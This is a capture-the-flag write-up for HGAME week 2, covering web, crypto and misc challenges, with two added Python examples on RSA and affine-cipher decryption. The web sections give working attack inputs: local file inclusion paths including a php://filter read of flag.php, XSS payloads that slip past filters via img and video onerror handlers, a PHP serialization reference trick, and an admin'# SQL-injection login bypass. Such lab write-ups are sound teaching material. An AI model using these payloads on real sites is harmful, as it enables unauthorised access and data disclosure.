HGAME-WEEK2-WRITE-UP
2018-03-09 13:27
web
Random?
Editing the code live with vim leaked the source. Reading random.php.swp reveals the key code:
$emmm = unserialize(serialize($a));
if (!is_object($emmm)) {
    die("error");
}
$emmm->public = random_int(0, 100000000);
$emmm->secret = random_int(0, 100000000);
if ($emmm->public == $emmm->secret) {
    echo $flag;
}
The public and secret properties of the submitted emmm object are each assigned a random value. In this situation we can make one property a reference to the other, so that the two "random" values end up identical:
class emmm {
    public $public;
    public $secret;
}
$a = new emmm();
$a->secret = &$a->public;
echo urlencode(serialize($a));
Submit the output and the flag comes back.
草莓社区-1
A simple LFI: ?mao=../flag.php gives the flag directly.
草莓社区-2
Still LFI. Use a PHP stream wrapper to read the file: ?mao=php://filter/read=convert.base64-encode/resource=../flag.php
Then base64-decode the output to get the flag.
XSS-1
Look at the filter:
function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/image/gi, '_');
input = input.replace(/\(/, '_');
return '<article>' + input+ '</article>';
}
img is still allowed:
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<img src=x onerror=alert(1)>
xss-2
Look at the filter:
function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/img/gi, '_');
input = input.replace(/image/gi, '_');
input = input.replace(/\(/, '_');
input = input.replace(/\>/, '_');
return '<input value="' + input + '" type="text">';
}
HTML entity encoding can be used to bypass it:
" type="image" src="a" onerror="alert(1)
Or use a video tag:
">><video src=1 onerror=alert`1`>
The simplest injection
Just use the universal password: username admin'# and anything for the password.
CRYPTO
easy rsa
Challenge: https://pastebin.com/yB5SQdhn. Solve the equations with MATLAB, then run a script. Script:
import libnum
from Crypto.Util.number import long_to_bytes
c = 4371976065894333890314975885075127128451240983808800709698046359245834252220415066013588488225793488033803390795656718853587692177687489853479502247266771924035749805299269602527272036788769904108885493823764984982805025952459173246366939243972669582338728034363614943062106220697944193226897767645789368465460202024200438535770983989035642434091720020123447189714932941203953201421143816856602410516207702904806903435163191348277867475813985765685033173827201970396908439360218409562692753257235084893548449865848486681931258855329384534422245333790248671083002562017871712806386748477524316776702973435067495735891
n = 10385112853503545283534594498014002163302819192542881359629016178651814593394538223939733674125477453748418677846543570433509186453439897628509042367641638605796280506469598857872127102183624493512082415420093824666579257184064851925863532407038708153173813845163607930388067232852387553655027755138043051251085946275767001373277444643651026212284925970808939348126454571156523402419571304104957238600724334148041629955456548891850609245486162713434748801968838458008730625275388077430783612116161245037630984479400721315318755404657093206825883572149393481806067157147431981573823960963614146686202457034323040706001
e = 65537
q = 133933997083089702453762501404889177223101226391505098183662564932163520880840961997705471383994176453589438770453090229951122946358812891951990562931866917274839029543379127657118330152316223686977562429606765674161593995316431725070847817817971515410474392037818149046718091344525818647452862614261258250943
p = 77539034746053684621485923427812119975612066379333186124187109849041447728407846098413602773105733428368391023092694065216091918285267572895015826696139841052638816326722407574936479442873205847400304572160883362157525347684671046552636655778287167264844797530347881153376471545728177228869882730086666365807
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
Also, a site for factoring large n online: http://factordb.com/index.php
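As an added example (not the author's script), here is the same "p and q are known" decryption with the sanity checks the script above skips (that p*q really is n, that e is invertible mod phi) and the CRT form of the private operation, which is how real implementations compute it. The small key is constructed for the demonstration; the challenge's c, n, e, p and q can be passed to the same functions.

```python
# Added example, not part of the original write-up.
from math import gcd


def rsa_decrypt(c: int, p: int, q: int, e: int, n: int = None) -> int:
    """Return m = c^d mod n with d = e^-1 mod phi(n); raise on inconsistent inputs."""
    if n is None:
        n = p * q
    if p * q != n:
        raise ValueError("p * q does not equal n: wrong factors or a typo")
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible mod phi(n)")
    if not 0 <= c < n:
        raise ValueError("ciphertext out of range")
    d = pow(e, -1, phi)
    return pow(c, d, n)


def rsa_decrypt_crt(c: int, p: int, q: int, e: int) -> int:
    """Same result, computed mod p and mod q separately and recombined (Garner's formula)."""
    dp = pow(e, -1, p - 1)
    dq = pow(e, -1, q - 1)
    q_inv = pow(q, -1, p)
    mp = pow(c, dp, p)
    mq = pow(c, dq, q)
    h = (q_inv * (mp - mq)) % p
    return mq + h * q


def int_to_bytes(m: int) -> bytes:
    """Equivalent of Crypto.Util.number.long_to_bytes for the decrypted integer."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def bytes_to_int(b: bytes) -> int:
    return int.from_bytes(b, "big")


# Constructed toy key (NOT the challenge values): p = 61, q = 53, e = 17, n = 3233.
P, Q, E = 61, 53, 17
N = P * Q

if __name__ == "__main__":
    m = bytes_to_int(b"A")  # 65
    c = pow(m, E, N)        # 2790
    print(rsa_decrypt(c, P, Q, E, N), rsa_decrypt_crt(c, P, Q, E))
    print(int_to_bytes(rsa_decrypt(c, P, Q, E, N)))
```

The p*q check matters in practice: a factor copied with one wrong digit produces a d that "works" without error and yields garbage, so checking the product before decrypting saves time hunting a non-existent bug elsewhere.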
The same simple RSA
Use the openssl command to read the information in pubkey.pem. I covered this challenge in detail in my earlier post 《关于openssl命令的一些随笔》 (some notes on the openssl command), so I won't go through it again here.
Caesar&&Caesar
mnbr firrf ztaii af vx meteq hal jzrvbz zulaq, qhsseey onyicinbh iyvnqío phw ko esflqsee hahxuifhtux rfgskusfn jvxu lzs somoii tbcd omd tb rbzgfvrf bji. rt gvta xzmr atjsedb ktz e miyztni ff
gkxuxp aqcul lfufsl, iyzlg cg alv bnbd vj r rvjxy sw cysty artrf moek rnb tsseg n pxk sw pbzbzlvd
fhhuij, wuwvo avrr kapxv aar xusimbil, smbe cfxomjtbfbj ixgf. hal afryr phw jo esvlrk tuom teey
gvbukj lnqdlh eazsl, hru ia ckkii tb wgkmtags moid ig ktz rvcrglhvp tb dhprk. eiskf cvae rnymeg gvx
tsetu cy teicu o yhqzll cy yexgrr zftjirg pvycd fsm bt khrwk aietf bxhv khr jbsprgr, ogk aztu o zyirt
hdkvei os dbwij aar dlxklrrkbqj tusr dsllq rbztcal bxd mevrbmpses. swkzx khrm uyslguh moi datbxa.
e yenjr ncgsl kbal rn hbmhqvd ostyh rnq gihvioj vtuhj, wuc buxioqivlh yizgxsj rs zsexyírdrg,
ibx fn n phsh guozbj hvmbblavrtvcg vj nhnh al lzmfsem grlysw alv evuaal noarxy sw tus eleinrr tsgyezwlaw
ff zovlhfnvo.
Vigenère decryption. Here is an online Vigenère brute-forcer: https://www.guballa.de/vigenere-solver
violence
The challenge:
a = ?
b = ?
m = ?
flag = "hgame{" + m + "}"
cipher = ''
for i in m:
    if 96 < ord(i) < 123:
        cipher += chr(a * (ord(i) + b - 97) % 26)
    else:
        cipher += i
print cipher.encode('hex')
# https://www.wikiwand.com/en/Affine_cipher
# the flag is a meaningful sentence
# cipher = 1917090506070905195f07065f06031505195f035f0a07065f170c5f1407170205101105
A typical affine cipher; brute-force a and b. Decryption script:
a = [1, 3, 5, 7, 9, 11, 15, 17, 19, 21, 23, 25]   # the values coprime with 26
c = list(bytes.fromhex('1917090506070905195f07065f06031505195f035f0a07065f170c5f1407170205101105').decode('latin-1'))
def dec(a, b, c):
    m = ''
    for k in c:
        if 96 < ord(k) + 97 < 123:   # raw bytes 0..25 are the encrypted letters
            m += chr((a * (ord(k) - b) % 26) + 97)
        else:
            m += k
    m = m.split('_')
    if m[3] == 'a' or m[3] == 'i':   # the fourth word is a single letter, so it must be "a" or "i"
        print(m)
for i in a:
    for j in range(1, 27):
        dec(pow(i, -1, 26), j, c)   # pow(i, -1, 26) is the modular inverse (gmpy2.invert(i, 26) in the original)
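As an added example (not the author's script), the same brute force in a tested form that also carries the challenge's encryption routine, so a recovered key can be confirmed by re-encrypting. It keeps the challenge's convention (letters become raw bytes 0..25, everything else passes through), tries all 12 × 26 valid keys, applies the page's own filter (every one-letter word must be a or i), and reports keys in the challenge's (a, b) convention rather than as (a⁻¹, b') like the script above. The only input is the ciphertext hex from the challenge.

```python
# Added example, not part of the original write-up.
from math import gcd

ALPHABET = 26
VALID_A = [a for a in range(1, ALPHABET) if gcd(a, ALPHABET) == 1]  # 12 values


def affine_encrypt(plaintext: str, a: int, b: int) -> bytes:
    """Replicates the challenge: c = a * (p + b) mod 26, emitted as a raw byte."""
    assert gcd(a, ALPHABET) == 1, "a must be invertible mod 26"
    out = bytearray()
    for ch in plaintext:
        if 96 < ord(ch) < 123:
            out.append(a * (ord(ch) - 97 + b) % ALPHABET)
        else:
            out.append(ord(ch))
    return bytes(out)


def affine_decrypt(cipher: bytes, a: int, b: int) -> str:
    """Inverse of affine_encrypt: p = a^-1 * c - b mod 26."""
    a_inv = pow(a, -1, ALPHABET)
    out = []
    for c in cipher:
        if c < ALPHABET:
            out.append(chr((a_inv * c - b) % ALPHABET + 97))
        else:
            out.append(chr(c))
    return "".join(out)


def brute_force(cipher: bytes) -> dict:
    """Try every (a, b); keep keys whose plaintext has only 'a'/'i' as one-letter words."""
    candidates = {}
    for a in VALID_A:
        for b in range(ALPHABET):
            m = affine_decrypt(cipher, a, b).replace("_", " ")
            singles = [w for w in m.split() if len(w) == 1]
            if singles and all(w in ("a", "i") for w in singles):
                candidates[(a, b)] = m
    return candidates


# Ciphertext hex given in the challenge.
CIPHER_HEX = "1917090506070905195f07065f06031505195f035f0a07065f170c5f1407170205101105"

if __name__ == "__main__":
    for key, text in sorted(brute_force(bytes.fromhex(CIPHER_HEX)).items()):
        print(key, text)
```

The filter leaves 24 candidates (two values of b per a, one making the single-letter word "a" and one making it "i"); the readable one is the sentence the challenge title hints at.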
xasr
Didn't solve it.
misc
咻咻咻
Opening the archive, it turns out no password is needed, so it was probably zip pseudo-encryption.
Extracting gives a wav file, so it is probably wav LSB steganography. Found a script on GitHub:
https://ethackal.github.io/2015/10/05/derbycon-ctf-wav-steganography/
It needs a Ruby environment.
The result is Base64; decode it to get the flag.
White cosmos
The file is hex 09 and 20 (tabs and spaces). I did a similar one at the last pwnhub crypto event (and even got a pwnhub invitation code out of it, 233333), but for some reason my script didn't work this time; later I realized you just convert to hex and then to a string. Simply replace 09 with 1 and 20 with 0. Decryption script:
#!/usr/bin/python3
# coding=utf-8
s = '09092009 20202020 09092020 09090920 09092020 20200920 09092009 09200920 09092020 09200920 09090909 20090920 09200920 09090920 09092020 09200920 09092009 09202020 09092020 20090920 20090920 20202020 09092009 09200920 09092020 09200920 09200909 09090920 20090920 20092020 09200909 09090920 09200920 09090920 09092009 20202020 09202009 20200920 09090920 09202020 09092020 09200920 09200909 09090920 09090920 20090920 09090920 20202020 20090920 09202020 09092020 20090920 09092020 09200920 09090909 092009'
# 09 -> 1, 20 -> 0, then join all the groups into one bit string
temp = "".join(s.replace('09', '1').replace('20', '0').split())
n = int(temp, 2)
print(hex(n))
# the leading 0 bit of the first character is not in s, so pad back to whole bytes before decoding
print(n.to_bytes((n.bit_length() + 7) // 8, 'big').decode())
easy password
The hint says the password is lowercase letters and digits, so brute-force the archive password to get the flag.
mysterious file header
It turns out to be a class file; decompile it with DJ Java Decompiler to get the Java code.
/*
 * Decompiled with CFR 0_123.
 */
package GUI;

import java.awt.Component;
import java.awt.GridLayout;
import java.awt.LayoutManager;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.JTextArea;

public class hgameGUI extends JFrame {
    private static final int DEFAULT_WIDTH = 300;
    private static final int DEFAULT_HEIGHT = 200;

    public hgameGUI() {
        super("Welcome to Hgame!");
        this.setSize(300, 200);
        JButton flag1 = new JButton("i'm flag");
        JButton flag2 = new JButton("i'm flag, too.");
        JButton flag3 = new JButton("RU kidding me? I'm the true flag!");
        JButton flag4 = new JButton("UR wrong, I'm the true flag!");
        JTextArea flagtext = new JTextArea("Want flag? Try upstairs.");
        JPanel flag = new JPanel();
        flag.setLayout(new GridLayout(5, 1));
        flag.add(flag1);
        flag.add(flag2);
        flag.add(flag3);
        flag.add(flag4);
        flag.add(flagtext);
        flag1.addActionListener(event -> { flagtext.setText("118"); });
        flag2.addActionListener(event -> { flagtext.setText("54"); });
        flag3.addActionListener(event -> { flagtext.setText("29"); });
        flag4.addActionListener(event -> { flagtext.setText("89"); });
        this.add(flag);
    }
}
Finally found the flag at 118.29.89.54.
week2 over!